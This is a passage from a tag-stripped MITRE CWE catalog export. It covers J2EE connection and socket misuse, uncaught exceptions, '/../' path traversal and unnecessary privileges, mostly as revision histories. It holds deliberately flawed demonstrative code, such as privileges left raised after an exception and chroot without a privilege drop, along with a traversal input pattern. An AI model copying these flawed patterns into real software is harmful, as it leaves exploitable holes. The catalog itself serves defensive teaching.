Other_Notes + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Heap Inspection + Failure to Clear Heap Memory Before Release + Failure to Clear Heap Memory Before Release (aka 'Heap Inspection') + Failure to Clear Heap Memory Before Release ('Heap Inspection') + + + + The J2EE application directly manages connections, instead of using the container's connection management facilities. + The J2EE standard forbids the direct management of connections. It requires that applications use the container's resource management facilities to obtain connections to resources. Every major web application container provides pooled database connection management as part of its resource management framework. Duplicating this functionality in an application is difficult and error prone, which is part of the reason it is forbidden under the J2EE standard. + + + + + + Primary + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In the following example, the class DatabaseConnection opens and manages a connection to a database for a J2EE application. The method openDatabaseConnection opens a connection to the database using a DriverManager to create the Connection object conn to the database specified in the string constant CONNECT_STRING. + + public class DatabaseConnection { + private static final String CONNECT_STRING = "jdbc:mysql://localhost:3306/mysqldb";private Connection conn = null; + public DatabaseConnection() {} + public void openDatabaseConnection() {try {conn = DriverManager.getConnection(CONNECT_STRING);} catch (SQLException ex) {...}} + // Member functions for retrieving database connection and accessing database... + } + + The use of the DriverManager class to directly manage the connection to the database violates the J2EE restriction against the direct management of connections. The J2EE application should use the web application container's resource management facilities to obtain a connection to the database as shown in the following example. + + public class DatabaseConnection { + + private static final String DB_DATASRC_REF = "jdbc:mysql://localhost:3306/mysqldb";private Connection conn = null; + public DatabaseConnection() {} + public void openDatabaseConnection() { + try { + InitialContext ctx = new InitialContext();DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);conn = datasource.getConnection(); + + } catch (NamingException ex) {...}} catch (SQLException ex) {...} + } + // Member functions for retrieving database connection and accessing database... + } + + + + + + J2EE Bad Practices: getConnection() + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Bad Practices: getConnection() + + + + The J2EE application directly uses sockets instead of using framework method calls. + + The J2EE standard permits the use of sockets only for the purpose of communication with legacy systems when no higher-level protocol is available. Authoring your own communication protocol requires wrestling with difficult security issues. + Without significant scrutiny by a security expert, chances are good that a custom communication protocol will suffer from security problems. Many of the same issues apply to a custom implementation of a standard protocol. While there are usually more resources available that address security concerns related to implementing a standard protocol, these resources are also available to attackers. + + + + + + + Resultant + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use framework method calls instead of using sockets directly. + + + + + The following example opens a socket to connect to a remote server. + + public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + + // Perform servlet tasks. + ... + + // Open a socket to a remote server (bad). + Socket sock = null; + try { + sock = new Socket(remoteHostname, 3000); + + // Do something with the socket. + ... + } catch (Exception e) {...} + } + + A Socket object is created directly within the Java servlet, which is a dangerous way to manage remote connections. + + + + + J2EE Bad Practices: Sockets + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Bad Practices: Sockets + + + + This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. + + Prohibited + This CWE has been deprecated. + See description for suggestions for other CWE IDs to use. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2013-06-23 + Critical + CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-07-20 + updated Name, References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Often Misused: Authentication + Reliance on DNS Lookups in a Security Decision + DEPRECATED (Duplicate): Reliance on DNS Lookups in a Security Decision + + + + An exception is thrown from a function, but it is not caught. + When an exception is not caught, it may cause the program to crash or expose sensitive information. + + + + + + + + + + + + + + Implementation + + + + + Availability + Confidentiality + DoS: Crash, Exit, or Restart + Read Application Data + An uncaught exception could cause the system to be placed in a state that could lead to a crash, exposure of sensitive information or other unintended behaviors. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following example attempts to resolve a hostname. + + protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} + + A DNS lookup failure will cause the Servlet to throw an exception. + + + The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s(). + + + EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. + + + + + Often Misused: Exception Handling + + + ERR05-J + Do not let checked exceptions escape from a finally block + + + ERR06-J + Do not throw undeclared checked exceptions + + + EXP31-PL + Do not suppress or ignore exceptions + Exact + + + SFP4 + Unchecked Status Condition + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-09-24 + Removed C from Applicable_Platforms + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Often Misused: Exception Handling + + + + + This entry has been deprecated because of name + confusion and an accidental combination of multiple + weaknesses. Most of its content has been transferred to + CWE-785. + + + This entry was deprecated for several reasons. The primary + reason is over-loading of the "path manipulation" term and the + description. The original description for this entry was the + same as that for the "Often Misused: File System" item in the + original Seven Pernicious Kingdoms paper. However, Seven + Pernicious Kingdoms also has a "Path Manipulation" phrase that + is for external control of pathnames (CWE-73), which is a + factor in symbolic link following and path traversal, neither + of which is explicitly mentioned in 7PK. Fortify uses the + phrase "Often Misused: Path Manipulation" for a broader range + of problems, generally for issues related to buffer + management. Given the multiple conflicting uses of this term, + there is a chance that CWE users may have incorrectly mapped + to this entry. + + The second reason for deprecation is an implied combination of + multiple weaknesses within buffer-handling functions. The + focus of this entry was generally on the path-conversion + functions and their association with buffer + overflows. However, some of Fortify's Vulncat entries have the + term "path manipulation" but describe a non-overflow weakness + in which the buffer is not guaranteed to contain the entire + pathname, i.e., there is information truncation (see CWE-222 + for a similar concept). A new entry for this non-overflow + weakness may be created in a future version of CWE. + + + Prohibited + This CWE has been deprecated. + See description for suggestions for other CWE IDs to use. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Critical + Described inconsistencies in this entry, which the CWE Content Team had already slated for deprecation. + + + CWE Content Team + MITRE + 2009-07-27 + updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type, White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated Description + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Often Misused: Path Manipulation + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "/../" sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + Sometimes a program checks for "../" at the beginning of the input, so a "/../" can bypass that check. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + '/../filedir + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Leading Dot Dot Slash - '/../filedir' + + + + The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. + + New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges. + Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges. + + + + + + + + + + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + Installation + + + Architecture and Design + + If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe. + + + + Operation + + + Medium + + + Confidentiality + Integrity + Availability + Access Control + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + Read Application Data + DoS: Crash, Exit, or Restart + An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data. + + + + + Manual Analysis + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users. + + Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Compare binary / bytecode to application permission manifest + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host Application Interface Scanner + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + Permission Manifest Analysis + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Separation of Privilege + Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators. + + + Architecture and Design + Attack Surface Reduction + Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators. + + + Implementation + Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements. + + + Implementation + When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed. + + + Implementation + If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place. + + + Operation + System Configuration + Environment Hardening + Ensure that the software runs properly under the United States Government Configuration Baseline (USGCB) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software. + + + + + This code temporarily raises the program's privileges to allow creation of a new user folder. + + def makeNewUserDir(username): + if invalidUsername(username): + + + #avoid CWE-22 and CWE-78 + print('Usernames cannot contain invalid characters')return False + + try:raisePrivileges()os.mkdir('/home/' + username)lowerPrivileges() + except OSError:print('Unable to create new user directory for user:' + username)return False + return True + + + + While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. + + + The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. + + chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... + + Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. + + + This application intends to use a user's location to determine the timezone the user is in: + + locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();setTimeZone(userCurrLocation); + + This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API. + + + This code uses location to determine the user's current US State location. + First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: + + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> + + During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: + + locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); + + While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. + + + + + CVE-2007-4217 + FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients. + https://www.cve.org/CVERecord?id=CVE-2007-4217 + + + CVE-2008-1877 + Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2008-1877 + + + CVE-2007-5159 + OS incorrectly installs a program with setuid privileges, allowing users to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2007-5159 + + + CVE-2008-4638 + Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). + https://www.cve.org/CVERecord?id=CVE-2008-4638 + + + CVE-2008-0162 + Program does not drop privileges before calling another program, allowing code execution. + https://www.cve.org/CVERecord?id=CVE-2008-0162 + + + CVE-2008-0368 + setuid root program allows creation of arbitrary files through command line argument. + https://www.cve.org/CVERecord?id=CVE-2008-0368 + + + CVE-2007-3931 + Installation script installs some programs as setuid when they shouldn't be. + https://www.cve.org/CVERecord?id=CVE-2007-3931 + + + CVE-2020-3812 + mail program runs as root but does not drop its privileges before attempting to access a file. Attacker can use a symlink from their home directory to a directory only readable by root, then determine whether the file exists based on the response. + https://www.cve.org/CVERecord?id=CVE-2020-3812 + + + + + Often Misused: Privilege Management + + + SER09-J + Minimize privileges before deserializing from a privilege context + + + Part 2-4 + Req SP.03.05 BR + + + Part 2-4 + Req SP.03.08 BR + + + Part 2-4 + Req SP.03.08 RE(1) + + + Part 2-4 + Req SP.05.07 BR + + + Part 2-4 + Req SP.09.02 RE(4) + + + Part 2-4 + Req SP.09.03 BR + + + Part 2-4 + Req SP.09.04 BR + + + Part 3-3 + Req SR 1.1 + + + Part 3-3 + Req SR 1.2 + + + Part 3-3 + Req SR 2.1 + + + Part 3-3 + Req SR 2.1 RE 1 + + + Part 4-1 + Req SD-4 + + + Part 4-2 + Req CCSC 3 + + + Part 4-2 + Req CR 1.1 + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible. + CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The "least privilege" phrase has multiple interpretations. + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated 